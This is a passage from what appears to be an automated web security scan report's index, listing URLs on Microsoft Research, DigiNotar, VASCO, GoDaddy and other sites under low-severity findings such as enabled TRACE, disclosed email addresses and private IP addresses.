18.91. http://research.microsoft.com/en-us/jobs/intern/default.aspx

18.92. http://research.microsoft.com/en-us/jobs/intern/russia.aspx

18.93. http://research.microsoft.com/en-us/labs/asia/default.aspx

18.94. http://research.microsoft.com/en-us/labs/cambridge/default.aspx

18.95. http://research.microsoft.com/en-us/labs/cmic/default.aspx

18.96. http://research.microsoft.com/en-us/labs/default.aspx

18.97. http://research.microsoft.com/en-us/labs/emic/default.aspx

18.98. http://research.microsoft.com/en-us/labs/fuse/default.aspx

18.99. http://research.microsoft.com/en-us/labs/ilabs/default.aspx

18.100. http://research.microsoft.com/en-us/labs/india/default.aspx

18.101. http://research.microsoft.com/en-us/labs/newengland/

18.102. http://research.microsoft.com/en-us/labs/newengland/default.aspx

18.103. http://research.microsoft.com/en-us/labs/redmond/default.aspx

18.104. http://research.microsoft.com/en-us/labs/siliconvalley/default.aspx

18.105. http://research.microsoft.com/en-us/labs/xcg/default.aspx

18.106. http://research.microsoft.com/en-us/news/features/2010interns-081610.aspx

18.107. http://research.microsoft.com/en-us/news/features/hoare-080411.aspx

18.108. http://research.microsoft.com/en-us/news/features/interns-080309.aspx

18.109. http://research.microsoft.com/en-us/news/features/interns2011-082511.aspx

18.110. http://research.microsoft.com/en-us/news/features/phillipstr35-082311.aspx

18.111. http://research.microsoft.com/en-us/news/features/siggraph2011awards.aspx

18.112. http://research.microsoft.com/en-us/news/features/speechrecognition-082911.aspx

18.113. http://research.microsoft.com/en-us/news/headlines/2011womenscholarships-012811.aspx

18.114. http://research.microsoft.com/en-us/news/headlines/ibukaaward-081511.aspx

18.115. http://research.microsoft.com/en-us/people/abadi/default.aspx

18.116. http://research.microsoft.com/en-us/people/adiamant/default.aspx

18.117. http://research.microsoft.com/en-us/people/ajbrush/default.aspx

18.118. http://research.microsoft.com/en-us/people/akashl/

18.119. http://research.microsoft.com/en-us/people/alecw/

18.120. http://research.microsoft.com/en-us/people/alexac/default.aspx

18.121. http://research.microsoft.com/en-us/people/aphillip/

18.122. http://research.microsoft.com/en-us/people/aproutie/

18.123. http://research.microsoft.com/en-us/people/aratan/default.aspx

18.124. http://research.microsoft.com/en-us/people/asellen/

18.125. http://research.microsoft.com/en-us/people/asellen/default.aspx

18.126. http://research.microsoft.com/en-us/people/bainguo/default.aspx

18.127. http://research.microsoft.com/en-us/people/bibuxton/default.aspx

18.128. http://research.microsoft.com/en-us/people/birrell/default.aspx

18.129. http://research.microsoft.com/en-us/people/blinn/default.aspx

18.130. http://research.microsoft.com/en-us/people/bycook/default.aspx

18.131. http://research.microsoft.com/en-us/people/cthacker/default.aspx

18.132. http://research.microsoft.com/en-us/people/dburger/

18.133. http://research.microsoft.com/en-us/people/dburger/default.aspx

18.134. http://research.microsoft.com/en-us/people/deng/default.aspx

18.135. http://research.microsoft.com/en-us/people/dmb/

18.136. http://research.microsoft.com/en-us/people/dmb/default.aspx

18.137. http://research.microsoft.com/en-us/people/dwork/

18.138. http://research.microsoft.com/en-us/people/gbell/default.aspx

18.139. http://research.microsoft.com/en-us/people/ggr/default.aspx

18.140. http://research.microsoft.com/en-us/people/goldberg/default.aspx

18.141. http://research.microsoft.com/en-us/people/grama/default.aspx

18.142. http://research.microsoft.com/en-us/people/gray/

18.143. http://research.microsoft.com/en-us/people/gray/default.aspx

18.144. http://research.microsoft.com/en-us/people/hon/default.aspx

18.145. http://research.microsoft.com/en-us/people/horvitz/default.aspx

18.146. http://research.microsoft.com/en-us/people/hsalama/default.aspx

18.147. http://research.microsoft.com/en-us/people/hshum/default.aspx

18.148. http://research.microsoft.com/en-us/people/indranim/

18.149. http://research.microsoft.com/en-us/people/jamiesho/

18.150. http://research.microsoft.com/en-us/people/jbishop/default.aspx

18.151. http://research.microsoft.com/en-us/people/jiansun/default.aspx

18.152. http://research.microsoft.com/en-us/people/johndo/default.aspx

18.153. http://research.microsoft.com/en-us/people/jplatt/default.aspx

18.154. http://research.microsoft.com/en-us/people/jtw/default.aspx

18.155. http://research.microsoft.com/en-us/people/krw/default.aspx

18.156. http://research.microsoft.com/en-us/people/kstrauss/

18.157. http://research.microsoft.com/en-us/people/larus/default.aspx

18.158. http://research.microsoft.com/en-us/people/lilich/

18.159. http://research.microsoft.com/en-us/people/lilich/default.aspx

18.160. http://research.microsoft.com/en-us/people/lintaoz/default.aspx

18.161. http://research.microsoft.com/en-us/people/liuj/default.aspx

18.162. http://research.microsoft.com/en-us/people/lomet/default.aspx

18.163. http://research.microsoft.com/en-us/people/luca/default.aspx

18.164. http://research.microsoft.com/en-us/people/malvar/

18.165. http://research.microsoft.com/en-us/people/malvar/default.aspx

18.166. http://research.microsoft.com/en-us/people/manuelc/default.aspx

18.167. http://research.microsoft.com/en-us/people/marycz/default.aspx

18.168. http://research.microsoft.com/en-us/people/mds/

18.169. http://research.microsoft.com/en-us/people/mds/default.aspx

18.170. http://research.microsoft.com/en-us/people/milanv/

18.171. http://research.microsoft.com/en-us/people/milanv/default.aspx

18.172. http://research.microsoft.com/en-us/people/mzh/

18.173. http://research.microsoft.com/en-us/people/najork/default.aspx

18.174. http://research.microsoft.com/en-us/people/pachou/default.aspx

18.175. http://research.microsoft.com/en-us/people/padmanab/default.aspx

18.176. http://research.microsoft.com/en-us/people/palarson/default.aspx

18.177. http://research.microsoft.com/en-us/people/parno/

18.178. http://research.microsoft.com/en-us/people/philbe/

18.179. http://research.microsoft.com/en-us/people/philbe/default.aspx

18.180. http://research.microsoft.com/en-us/people/ramjee/

18.181. http://research.microsoft.com/en-us/people/ranveer/default.aspx

18.182. http://research.microsoft.com/en-us/people/rashid/default.aspx

18.183. http://research.microsoft.com/en-us/people/richdr/default.aspx

18.184. http://research.microsoft.com/en-us/people/robertson/default.aspx

18.185. http://research.microsoft.com/en-us/people/roylevin/

18.186. http://research.microsoft.com/en-us/people/sdumais/default.aspx

18.187. http://research.microsoft.com/en-us/people/shuvendu/default.aspx

18.188. http://research.microsoft.com/en-us/people/simonpj/

18.189. http://research.microsoft.com/en-us/people/simonpj/default.aspx

18.190. http://research.microsoft.com/en-us/people/spli/

18.191. http://research.microsoft.com/en-us/people/surajitc/

18.192. http://research.microsoft.com/en-us/people/surajitc/default.aspx

18.193. http://research.microsoft.com/en-us/people/terry/default.aspx

18.194. http://research.microsoft.com/en-us/people/thekkath/default.aspx

18.195. http://research.microsoft.com/en-us/people/thoare/

18.196. http://research.microsoft.com/en-us/people/thoare/default.aspx

18.197. http://research.microsoft.com/en-us/people/tonyhey/default.aspx

18.198. http://research.microsoft.com/en-us/people/tsharp/

18.199. http://research.microsoft.com/en-us/people/wenwuzhu/default.aspx

18.200. http://research.microsoft.com/en-us/people/wobber/default.aspx

18.201. http://research.microsoft.com/en-us/people/wong/default.aspx

18.202. http://research.microsoft.com/en-us/people/wyma/

18.203. http://research.microsoft.com/en-us/people/zhao/default.aspx

18.204. http://research.microsoft.com/en-us/press/ablake.aspx

18.205. http://research.microsoft.com/en-us/press/anandan.aspx

18.206. http://research.microsoft.com/en-us/press/bainguo.aspx

18.207. http://research.microsoft.com/en-us/press/borgs.aspx

18.208. http://research.microsoft.com/en-us/press/cmbishop.aspx

18.209. http://research.microsoft.com/en-us/press/default.aspx

18.210. http://research.microsoft.com/en-us/press/fastfacts.aspx

18.211. http://research.microsoft.com/en-us/press/hon.aspx

18.212. http://research.microsoft.com/en-us/press/jchayes.aspx

18.213. http://research.microsoft.com/en-us/press/kevinsch.aspx

18.214. http://research.microsoft.com/en-us/press/kwood.aspx

18.215. http://research.microsoft.com/en-us/press/malvar.aspx

18.216. http://research.microsoft.com/en-us/press/mds.aspx

18.217. http://research.microsoft.com/en-us/press/overview.aspx

18.218. http://research.microsoft.com/en-us/press/rajamani.aspx

18.219. http://research.microsoft.com/en-us/press/roylevin.aspx

18.220. http://research.microsoft.com/en-us/press/telabbady.aspx

18.221. http://research.microsoft.com/en-us/projects/chem4word/default.aspx

18.222. http://research.microsoft.com/en-us/projects/creativecommons/default.aspx

18.223. http://research.microsoft.com/en-us/projects/csec/

18.224. http://research.microsoft.com/en-us/projects/nodexl/

18.225. http://research.microsoft.com/en-us/projects/researchgames/

18.226. http://research.microsoft.com/en-us/projects/serviceos/

18.227. http://research.microsoft.com/en-us/projects/wwt/contest.aspx

18.228. http://research.microsoft.com/en-us/projects/wwt/default.aspx

18.229. http://research.microsoft.com/en-us/research/default.aspx

18.230. http://research.microsoft.com/en-us/um/people/awf/

18.231. http://research.microsoft.com/en-us/um/people/bahl/

18.232. http://research.microsoft.com/en-us/um/people/borgs/

18.233. http://research.microsoft.com/en-us/um/people/jchayes/

18.234. http://research.microsoft.com/en-us/um/people/szeliski/

18.235. http://research.microsoft.com/en-us/um/redmond/about/timeline/

18.236. http://research.microsoft.com/en-us/um/redmond/projects/kinectsdk/

18.237. http://research.microsoft.com/en-us/um/redmond/projects/kinectsdk/download.aspx

18.238. http://research.microsoft.com/feedGen/

18.239. http://research.microsoft.com/nothing.html

18.240. http://social.expression.microsoft.com/Forums/ar-SA/wpf/thread/786f2813-de28-4eda-ba14-9910ce655dc6

18.241. http://social.expression.microsoft.com/Forums/da-DK/wpf/thread/16309d89-5f65-4e49-9ce5-38f2a466a2c0

18.242. http://vasco.com/company/contactus.aspx

18.243. http://vasco.com/company/press_room/news_archive/2011/news_diginotar_reports_security_incident.aspx

18.244. http://vasco.com/favicon.ico

18.245. http://vasco.com/images/css/readmore_bg.gif

18.246. http://vasco.com/investor_relations/investor_press/investors_press.aspx

18.247. http://vasco.com/services/services.aspx

18.248. http://vasco.com/support/support_and_downloads.aspx

18.249. http://vasco.com/training/our_offering/elearning/certified_ethical_hacking.aspx

18.250. http://vasco.com/user_registration.aspx

18.251. http://vasco.com/verticals/appsecurity/online_application_security_overview.aspx

18.252. http://vasco.com/verticals/banking/onlinebanking.aspx

18.253. http://vasco.com/verticals/netsecurity/network_access_security.aspx

18.254. http://www.cheapssls.com/

18.255. http://www.cheapssls.com/comodo-ssl-certificates/positivessl.html

18.256. http://www.cheapssls.com/comodo-ssl-certificates/premiumssl.html

18.257. http://www.cheapssls.com/geotrust-ssl-certificates/

18.258. http://www.cheapssls.com/geotrust-ssl-certificates/quickssl-premium.html

18.259. http://www.cheapssls.com/geotrust-ssl-certificates/quickssl.html

18.260. http://www.cheapssls.com/geotrust-ssl-certificates/rapidssl.html

18.261. http://www.cheapssls.com/index.php

18.262. https://www.cheapssls.com/

18.263. https://www.cheapssls.com/index.php

18.264. http://www.dotnetnuke.com/News/Press-Releases/HTTP-Compression-Module.aspx

18.265. http://www.dotnetnuke.com/Resources/Wiki/page/Compression.aspx

18.266. http://www.godaddy.com/Payment/payment-options.aspx

18.267. http://www.godaddy.com/affiliates/affiliate-program.aspx

18.268. http://www.godaddy.com/gdshop/offers/cross_sell.asp

18.269. http://www.godaddy.com/ssl/ssl-certificates.aspx

18.270. http://www.hostnj.net/

18.271. http://www.hostnj.net/products-page/ssl-security/comodo-intranet-ssl-certificate/

18.272. http://www.meetup.com/

18.273. http://www.meetup.com/Boston-BizSpark-Meetup/

18.274. http://www.meetup.com/Boston-BizSpark-Meetup/events/30620321/

18.275. http://www.meetup.com/sponsorships/

18.276. http://www.meetup.com/whats_new/

18.277. http://www.microcad.ca/

18.278. http://www.microcad.ca/cart

18.279. http://www.microcad.ca/customerservice/about

18.280. http://www.microcad.ca/products/details/McAfee-SafeBoot-Web-Server-SSL-Certificate-with-1-Year-Gold-Support-1-User-1011956760

18.281. https://www.microcad.ca/auth/login

18.282. https://www.microcad.ca/checkout/address

18.283. http://www.microsoft-careers.com/find.job

18.284. http://www.microsoft-careers.com/job/Cambridge-Database-Administrator-TV-2FVideo-Advertising-Job-MA-02138/1394190/

18.285. http://www.microsoft-careers.com/job/Cambridge-Product-Planner,-Lead-APS-754562-Job-MA-02138/1248350/

18.286. http://www.microsoft-careers.com/job/Cambridge-Program-Manager-Interactive-Entertainment-Business-Job-MA-02138/1186137/

18.287. http://www.microsoft-careers.com/job/Cambridge-SDE-2C-Senior-763405-Job-MA-02138/1388917/

18.288. http://www.microsoft-careers.com/job/Cambridge-Software-Development-Engineer-in-Test-II-Office-365-Job-MA-02138/1289133/

18.289. http://www.microsoft-careers.com/job/Cambridge-Software-Test-Engineer-28SDET-29-II-Job-MA-02138/1383264/

18.290. http://www.microsoft-careers.com/job/Cambridge-System-Engineer-TV-2FVideo-Advertising-Job-MA-02138/1394205/

18.291. http://www.microsoft-careers.com/search

18.292. https://www.microsoft-careers.com/

18.293. https://www.microsoft-careers.com/content/corporate-research/

18.294. https://www.microsoft-careers.com/find.job

18.295. https://www.microsoft-careers.com/find.job

18.296. https://www.microsoft-careers.com/go/Microsoft-Research-Jobs/217358/

18.297. https://www.microsoft-careers.com/job/Redmond-Senior-Software-Development-Engineer-Job-WA-98052/1436711/

18.298. https://www.microsoft-careers.com/talentcommunity/subscribe/

18.299. http://www.omniture.com/en/

18.300. http://www.register.com/

18.301. http://www.register.com/domain/searchresults.rcmx

18.302. http://www.register.com/unauthenticated_session_expired.rcmx

18.303. https://www.sslmatrix.com/Order/quickorder

18.304. https://www.sslmatrix.com/ssl-promotion-code

18.305. https://www.sslmatrix.com/ssl-promotion-code/ssl-price

18.306. http://www.vasco.com/favicon.ico

18.307. http://www.vasco.com/images/css/readmore_bg.gif

19. File upload functionality

20. TRACE method is enabled

20.1. http://bh.contextweb.com/

20.2. http://content.etilize.com/

20.3. http://image2.pubmatic.com/

20.4. http://login.dotomi.com/

20.5. http://pixel.rubiconproject.com/

20.6. http://www.register.com/

20.7. http://www.shrinktheweb.com/

21. Email addresses disclosed

21.1. http://a1848.g.akamai.net/7/1848/13927/v001/godaddysof1.download.akamai.com/13755/GDAffiliate_ACH_640x360_large.flv

21.2. http://api.twitter.com/1/statuses/user_timeline/msnewengland.json

21.3. https://cart.godaddy.com/basket.aspx

21.4. http://diginotar.nl/Portals/7/Skins/Diginotar_v7_NL/script/jqueryinnerfade.js

21.5. http://diginotar.nl/Portals/_default/Skins/Diginotar_v7_NL/script/jqueryinnerfade.js

21.6. http://diginotar.nl/controls/SolpartMenu/spmenu.js

21.7. http://frankgruber.me/post/9680693152/the-view-looking-out-from-techcocktail-boston-at

21.8. https://idp.godaddy.com/login.aspx

21.9. https://idp.godaddy.com/retrieveaccount.aspx

21.10. http://img3.wsimg.com/pc/js/1/gd_js_20110817.min.js

21.11. http://maps.gstatic.com/cat_js/intl/en_us/mapfiles/363c/maps2/%7Bmain,mod_util,mod_act,mod_act_s,mod_actbr,mod_adf,mod_appiw,mod_mg,mod_mssvt,mod_rst,mod_strr%7D.js

21.12. http://microsoftcambridge.com/Events/tabid/57/Default.aspx

21.13. http://microsoftcambridge.com/Resources/Shared/scripts/DotNetNukeAjaxShared.js

21.14. http://microsoftcambridge.com/Resources/Shared/scripts/widgets.js

21.15. http://microsoftcambridge.com/controls/SolpartMenu/spmenu.js

21.16. http://research.microsoft.com/en-us/about/contactus.aspx

21.17. http://research.microsoft.com/en-us/collaboration/awards/fellows-women.aspx

21.18. http://research.microsoft.com/en-us/collaboration/global/india/india-awards.aspx

21.19. http://research.microsoft.com/en-us/collaboration/global/india/phdfellowships.aspx

21.20. http://research.microsoft.com/en-us/collaboration/global/latam/latam-awards.aspx

21.21. http://research.microsoft.com/en-us/collaboration/global/northam/northam-awards.aspx

21.22. http://research.microsoft.com/en-us/events/escience2011/

21.23. http://research.microsoft.com/en-us/jobs/intern/cmic.aspx

21.24. http://research.microsoft.com/en-us/labs/cmic/default.aspx

21.25. http://research.microsoft.com/en-us/labs/ilabs/default.aspx

21.26. http://research.microsoft.com/en-us/news/features/2010interns-081610.aspx

21.27. http://research.microsoft.com/en-us/news/features/hoare-080411.aspx

21.28. http://research.microsoft.com/en-us/news/features/interns-080309.aspx

21.29. http://research.microsoft.com/en-us/news/features/interns2011-082511.aspx

21.30. http://research.microsoft.com/en-us/news/features/phillipstr35-082311.aspx

21.31. http://research.microsoft.com/en-us/news/features/siggraph2011awards.aspx

21.32. http://research.microsoft.com/en-us/news/features/speechrecognition-082911.aspx

21.33. http://research.microsoft.com/en-us/news/headlines/ibukaaward-081511.aspx

21.34. http://research.microsoft.com/en-us/people/bycook/default.aspx

21.35. http://research.microsoft.com/en-us/people/gray/

21.36. http://research.microsoft.com/en-us/people/gray/default.aspx

21.37. http://research.microsoft.com/en-us/people/larus/default.aspx

21.38. http://research.microsoft.com/en-us/people/liuj/default.aspx

21.39. http://research.microsoft.com/en-us/people/padmanab/default.aspx

21.40. http://research.microsoft.com/en-us/people/palarson/default.aspx

21.41. http://research.microsoft.com/en-us/people/philbe/

21.42. http://research.microsoft.com/en-us/people/philbe/default.aspx

21.43. http://research.microsoft.com/en-us/people/ramjee/

21.44. http://research.microsoft.com/en-us/people/ranveer/default.aspx

21.45. http://research.microsoft.com/en-us/people/richdr/default.aspx

21.46. http://research.microsoft.com/en-us/people/simonpj/

21.47. http://research.microsoft.com/en-us/people/simonpj/default.aspx

21.48. http://research.microsoft.com/en-us/people/thekkath/default.aspx

21.49. http://research.microsoft.com/en-us/press/default.aspx

21.50. http://research.microsoft.com/en-us/projects/wwt/contest.aspx

21.51. http://research.microsoft.com/en-us/um/people/abegel/starlogo/starlogo-kybernetes-paper.doc

21.52. http://research.microsoft.com/en-us/um/people/bahl/

21.53. http://research.microsoft.com/en-us/um/people/blampson/

21.54. http://research.microsoft.com/en-us/um/people/borgs/

21.55. http://research.microsoft.com/en-us/um/people/heckerman/

21.56. http://research.microsoft.com/en-us/um/people/hjzhang/

21.57. http://research.microsoft.com/en-us/um/people/horvitz/

21.58. http://research.microsoft.com/en-us/um/people/jchayes/

21.59. http://research.microsoft.com/en-us/um/people/jgrudin/

21.60. http://research.microsoft.com/en-us/um/people/sdumais/

21.61. http://research.microsoft.com/en-us/um/people/ssaponas/

21.62. http://research.microsoft.com/en-us/um/people/szeliski/

21.63. http://research.microsoft.com/en-us/um/people/zhang/

21.64. http://research.microsoft.com/en-us/um/redmond/groups/ivm/ICE/

21.65. http://research.microsoft.com/en-us/um/redmond/groups/ivm/hdview/

21.66. http://research.microsoft.com/en-us/um/redmond/projects/songsmith/

21.67. http://scripts.omniture.com/javascript.js

21.68. http://shop.vasco.com/error_500.aspx

21.69. https://shop.vasco.com/legal.aspx

21.70. https://shop.vasco.com/privacy_statement.aspx

21.71. https://shop.vasco.com/terms_and_conditions.aspx

21.72. http://static.tumblr.com/fftf9xi/GXWlp9jjo/core.css

21.73. https://support.microsoft.com/contactus/emailcontact.aspx

21.74. http://twitter.com/account/bootstrap_data

21.75. http://vasco.com/company/press_room/news_archive/2011/news_diginotar_reports_security_incident.aspx

21.76. http://vasco.com/js/rotating_banner.js

21.77. http://vasco.com/user_registration.aspx

21.78. http://w.sharethis.com/button/buttons.js

21.79. http://www.digicert.com/

21.80. http://www.diginotar.com/Portals/0/Skins/DigiNotar_V7_COM/script/jqueryinnerfade.js

21.81. http://www.diginotar.com/Products/ExtendedValidationSSL/tabid/622/Default.aspx

21.82. http://www.diginotar.com/Products/Identity/CertiIDManagedPKI/tabid/2246/Default.aspx

21.83. http://www.diginotar.com/Resources/Shared/scripts/DotNetNukeAjaxShared.js

21.84. http://www.diginotar.com/Resources/Shared/scripts/widgets.js

21.85. http://www.diginotar.com/controls/SolpartMenu/spmenu.js

21.86. http://www.diginotar.com/portals/0/PrivacyStatement.pdf

21.87. https://www.diginotar.com/Portals/0/Skins/DigiNotar_V7_COM/script/jqueryinnerfade.js

21.88. https://www.diginotar.com/Resources/Shared/scripts/DotNetNukeAjaxShared.js

21.89. https://www.diginotar.com/Resources/Shared/scripts/widgets.js

21.90. https://www.diginotar.com/controls/SolpartMenu/spmenu.js

21.91. http://www.diginotar.nl/Portals/7/Skins/Diginotar_v7_NL/script/jqueryinnerfade.js

21.92. http://www.diginotar.nl/controls/SolpartMenu/spmenu.js

21.93. http://www.dnncreative.com/Resources/Shared/scripts/DotNetNukeAjaxShared.js

21.94. http://www.dnncreative.com/Resources/Shared/scripts/widgets.js

21.95. http://www.dotnetnuke.com/News/Press-Releases/HTTP-Compression-Module.aspx

21.96. http://www.dotnetnuke.com/Resources/Wiki/page/Compression.aspx

21.97. http://www.godaddy.com/Payment/payment-options.aspx

21.98. http://www.godaddy.com/affiliates/affiliate-program.aspx

21.99. http://www.godaddy.com/gdshop/offers/cross_sell.asp

21.100. http://www.godaddy.com/ssl/ssl-certificates.aspx

21.101. http://www.hostnj.net/

21.102. http://www.hostnj.net/products-page/ssl-security/comodo-intranet-ssl-certificate/

21.103. http://www.hostnj.net/wp-content/plugins/lightbox-plus/js/jquery.colorbox-min.js

21.104. http://www.microsoft-careers.com/find.job

21.105. http://www.microsoft-careers.com/job/Cambridge-Database-Administrator-TV-2FVideo-Advertising-Job-MA-02138/1394190/

21.106. http://www.microsoft-careers.com/job/Cambridge-Product-Planner,-Lead-APS-754562-Job-MA-02138/1248350/

21.107. http://www.microsoft-careers.com/job/Cambridge-Program-Manager-Interactive-Entertainment-Business-Job-MA-02138/1186137/

21.108. http://www.microsoft-careers.com/job/Cambridge-SDE-2C-Senior-763405-Job-MA-02138/1388917/

21.109. http://www.microsoft-careers.com/job/Cambridge-Software-Development-Engineer-in-Test-II-Office-365-Job-MA-02138/1289133/

21.110. http://www.microsoft-careers.com/job/Cambridge-Software-Test-Engineer-28SDET-29-II-Job-MA-02138/1383264/

21.111. http://www.microsoft-careers.com/job/Cambridge-System-Engineer-TV-2FVideo-Advertising-Job-MA-02138/1394205/

21.112. http://www.microsoft-careers.com/search

21.113. https://www.microsoft-careers.com/

21.114. https://www.microsoft-careers.com/content/corporate-research/

21.115. https://www.microsoft-careers.com/find.job

21.116. https://www.microsoft-careers.com/go/Microsoft-Research-Jobs/217358/

21.117. https://www.microsoft-careers.com/job/Redmond-Senior-Software-Development-Engineer-Job-WA-98052/1436711/

21.118. https://www.microsoft-careers.com/talentcommunity/subscribe/

21.119. http://www.register.com/js/domain-taken.js

21.120. http://www.register.com/js/jquery.cookie.js

21.121. https://www.sslmatrix.com/script/jquery.hoverIntent.js

21.122. https://www.sslmatrix.com/script/jquery.jqGrid.min.js

21.123. https://www.sslmatrix.com/script/jquery_menu.js

21.124. http://www.vasco.com/js/rotating_banner.js

22. Private IP addresses disclosed

22.1. http://research.microsoft.com/Search

22.2. http://research.microsoft.com/apps/dp/areas.aspx

22.3. http://research.microsoft.com/apps/dp/blank.jpg

22.4. http://research.microsoft.com/apps/dp/dl/downloads.aspx

22.5. http://research.microsoft.com/apps/dp/downloads.aspx

22.6. http://research.microsoft.com/apps/dp/ev/events.aspx

22.7. http://research.microsoft.com/apps/dp/gr/groups.aspx

22.8. http://research.microsoft.com/apps/dp/groups.aspx

22.9. http://research.microsoft.com/apps/dp/i/reverse_

22.10. http://research.microsoft.com/apps/dp/ne/news.aspx

22.11. http://research.microsoft.com/apps/dp/news.aspx

22.12. http://research.microsoft.com/apps/dp/pe/people.aspx

22.13. http://research.microsoft.com/apps/dp/pr/projects.aspx

22.14. http://research.microsoft.com/apps/dp/projects.aspx

22.15. http://research.microsoft.com/apps/dp/pu/publications.aspx

22.16. http://research.microsoft.com/apps/dp/search.aspx

22.17. http://research.microsoft.com/apps/dp/search.aspx

22.18. http://research.microsoft.com/apps/dp/vi/videos.aspx

22.19. http://research.microsoft.com/apps/pubs/default.aspx

22.20. http://research.microsoft.com/apps/pubs/default.aspx

22.21. http://research.microsoft.com/apps/search/videosearch.ashx

22.22. http://research.microsoft.com/apps/video/default.aspx

22.23. http://research.microsoft.com/apps/video/default.aspx

22.24. http://research.microsoft.com/en-us/about/awards.aspx

22.25. http://research.microsoft.com/en-us/about/brochure-1.aspx

22.26. http://research.microsoft.com/en-us/about/brochure-2.aspx

22.27. http://research.microsoft.com/en-us/about/brochure-3.aspx

22.28. http://research.microsoft.com/en-us/about/brochure-4.aspx

22.29. http://research.microsoft.com/en-us/about/brochure-5.aspx

22.30. http://research.microsoft.com/en-us/about/brochure-6.aspx

22.31. http://research.microsoft.com/en-us/about/brochure-7.aspx

22.32. http://research.microsoft.com/en-us/about/brochure-8.aspx

22.33. http://research.microsoft.com/en-us/about/brochure-9.aspx

22.34. http://research.microsoft.com/en-us/about/contactus.aspx

22.35. http://research.microsoft.com/en-us/about/default.aspx

22.36. http://research.microsoft.com/en-us/about/directors.aspx

22.37. http://research.microsoft.com/en-us/about/feature/downloads.aspx

22.38. http://research.microsoft.com/en-us/about/paperawards.aspx

22.39. http://research.microsoft.com/en-us/collaboration/about/default.aspx

22.40. http://research.microsoft.com/en-us/collaboration/about/events.aspx

22.41. http://research.microsoft.com/en-us/collaboration/about/projects.aspx

22.42. http://research.microsoft.com/en-us/collaboration/about/summits.aspx

22.43. http://research.microsoft.com/en-us/collaboration/awards/default.aspx

22.44. http://research.microsoft.com/en-us/collaboration/awards/fellows-women.aspx

22.45. http://research.microsoft.com/en-us/collaboration/awards/fellowships.aspx

22.46. http://research.microsoft.com/en-us/collaboration/awards/opportunities.aspx

22.47. http://research.microsoft.com/en-us/collaboration/bg_txt.png

22.48. http://research.microsoft.com/en-us/collaboration/default.aspx

22.49. http://research.microsoft.com/en-us/collaboration/focus/cs/default.aspx

22.50. http://research.microsoft.com/en-us/collaboration/focus/e3/default.aspx

22.51. http://research.microsoft.com/en-us/collaboration/focus/education/default.aspx

22.52. http://research.microsoft.com/en-us/collaboration/focus/escience/default.aspx

22.53. http://research.microsoft.com/en-us/collaboration/focus/health/default.aspx

22.54. http://research.microsoft.com/en-us/collaboration/focus/nui/default.aspx

22.55. http://research.microsoft.com/en-us/collaboration/global/asia-pacific/default.aspx

22.56. http://research.microsoft.com/en-us/collaboration/global/asia-pacific/talent/awards-asia-pacific.aspx

22.57. http://research.microsoft.com/en-us/collaboration/global/asia-pacific/talent/mstc.aspx

22.58. http://research.microsoft.com/en-us/collaboration/global/europe/default.aspx

22.59. http://research.microsoft.com/en-us/collaboration/global/europe/europe-awards.aspx

22.60. http://research.microsoft.com/en-us/collaboration/global/india/default.aspx

22.61. http://research.microsoft.com/en-us/collaboration/global/india/india-awards.aspx

22.62. http://research.microsoft.com/en-us/collaboration/global/india/phdfellowships.aspx

22.63. http://research.microsoft.com/en-us/collaboration/global/latam/default.aspx

22.64. http://research.microsoft.com/en-us/collaboration/global/latam/latam-awards.aspx

22.65. http://research.microsoft.com/en-us/collaboration/global/me-africa/default.aspx

22.66. http://research.microsoft.com/en-us/collaboration/global/northam/default.aspx

22.67. http://research.microsoft.com/en-us/collaboration/global/northam/northam-awards.aspx

22.68. http://research.microsoft.com/en-us/collaboration/institutes/default.aspx

22.69. http://research.microsoft.com/en-us/collaboration/tools/default.aspx

22.70. http://research.microsoft.com/en-us/community/default.aspx

22.71. http://research.microsoft.com/en-us/default.aspx

22.72. http://research.microsoft.com/en-us/default.aspx

22.73. http://research.microsoft.com/en-us/events/escience2011/

22.74. http://research.microsoft.com/en-us/events/indiaschooljune2011/

22.75. http://research.microsoft.com/en-us/events/women-in-computing2011/

22.76. http://research.microsoft.com/en-us/jobs/default.aspx

22.77. http://research.microsoft.com/en-us/jobs/default.aspx

22.78. http://research.microsoft.com/en-us/jobs/fulltime/default.aspx

22.79. http://research.microsoft.com/en-us/jobs/fulltime/researcher.aspx

22.80. http://research.microsoft.com/en-us/jobs/intern/about_asia-pacific.aspx

22.81. http://research.microsoft.com/en-us/jobs/intern/about_ca.aspx

22.82. http://research.microsoft.com/en-us/jobs/intern/about_india.aspx

22.83. http://research.microsoft.com/en-us/jobs/intern/about_uk.aspx

22.84. http://research.microsoft.com/en-us/jobs/intern/about_wa.aspx

22.85. http://research.microsoft.com/en-us/jobs/intern/cmic.aspx

22.86. http://research.microsoft.com/en-us/jobs/intern/default.aspx

22.87. http://research.microsoft.com/en-us/jobs/intern/russia.aspx

22.88. http://research.microsoft.com/en-us/labs/asia/default.aspx

22.89. http://research.microsoft.com/en-us/labs/cambridge/default.aspx

22.90. http://research.microsoft.com/en-us/labs/cmic/default.aspx

22.91. http://research.microsoft.com/en-us/labs/default.aspx

22.92. http://research.microsoft.com/en-us/labs/emic/default.aspx

22.93. http://research.microsoft.com/en-us/labs/fuse/default.aspx

22.94. http://research.microsoft.com/en-us/labs/ilabs/default.aspx

22.95. http://research.microsoft.com/en-us/labs/india/default.aspx

22.96. http://research.microsoft.com/en-us/labs/newengland/

22.97. http://research.microsoft.com/en-us/labs/newengland/default.aspx

22.98. http://research.microsoft.com/en-us/labs/redmond/default.aspx

22.99. http://research.microsoft.com/en-us/labs/siliconvalley/default.aspx

22.100. http://research.microsoft.com/en-us/labs/xcg/default.aspx

22.101. http://research.microsoft.com/en-us/news/features/2010interns-081610.aspx

22.102. http://research.microsoft.com/en-us/news/features/hoare-080411.aspx

22.103. http://research.microsoft.com/en-us/news/features/interns-080309.aspx

22.104. http://research.microsoft.com/en-us/news/features/interns2011-082511.aspx

22.105. http://research.microsoft.com/en-us/news/features/phillipstr35-082311.aspx

22.106. http://research.microsoft.com/en-us/news/features/siggraph2011awards.aspx

22.107. http://research.microsoft.com/en-us/news/features/speechrecognition-082911.aspx

22.108. http://research.microsoft.com/en-us/news/headlines/2011womenscholarships-012811.aspx

22.109. http://research.microsoft.com/en-us/news/headlines/ibukaaward-081511.aspx

22.110. http://research.microsoft.com/en-us/people/abadi/default.aspx

22.111. http://research.microsoft.com/en-us/people/adiamant/default.aspx

22.112. http://research.microsoft.com/en-us/people/ajbrush/default.aspx

22.113. http://research.microsoft.com/en-us/people/akashl/

22.114. http://research.microsoft.com/en-us/people/alecw/

22.115. http://research.microsoft.com/en-us/people/alexac/default.aspx

22.116. http://research.microsoft.com/en-us/people/aphillip/

22.117. http://research.microsoft.com/en-us/people/aproutie/

